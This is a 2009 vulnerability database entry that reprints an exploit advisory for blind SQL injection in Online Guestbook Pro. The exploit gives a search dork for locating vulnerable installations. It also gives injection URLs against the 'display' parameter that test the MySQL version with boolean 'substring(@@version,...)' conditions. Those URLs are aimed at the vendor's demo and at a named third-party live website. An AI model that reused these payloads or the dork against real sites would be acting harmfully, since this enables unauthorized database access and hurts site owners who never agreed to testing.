Online Guestbook Pro (display) Blind SQL Injection Vulnerability

Vulnerability ID 1052017 Vulnerability type
Published 2009-04-17 Updated 2009-04-17
CVE ID N/A CNNVD-ID N/A
Affected platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2009040054
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
Online Guestbook Pro (display) Blind SQL Injection Vulnerability


{____________________________________}
 Author: Hussin X

 Home :  WwW.IQ-TY.CoM

 email:  darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php

DorK   : Powered by Online Guestbook Pro




Demo :

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and
substring(@@version,1,1)=5

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and
substring(@@version,1,1)=4

BuT Results = Forbidden :D


demo to any web

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and
substring(@@version,1,1)=5

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and
substring(@@version,1,1)=4





Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke |
Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.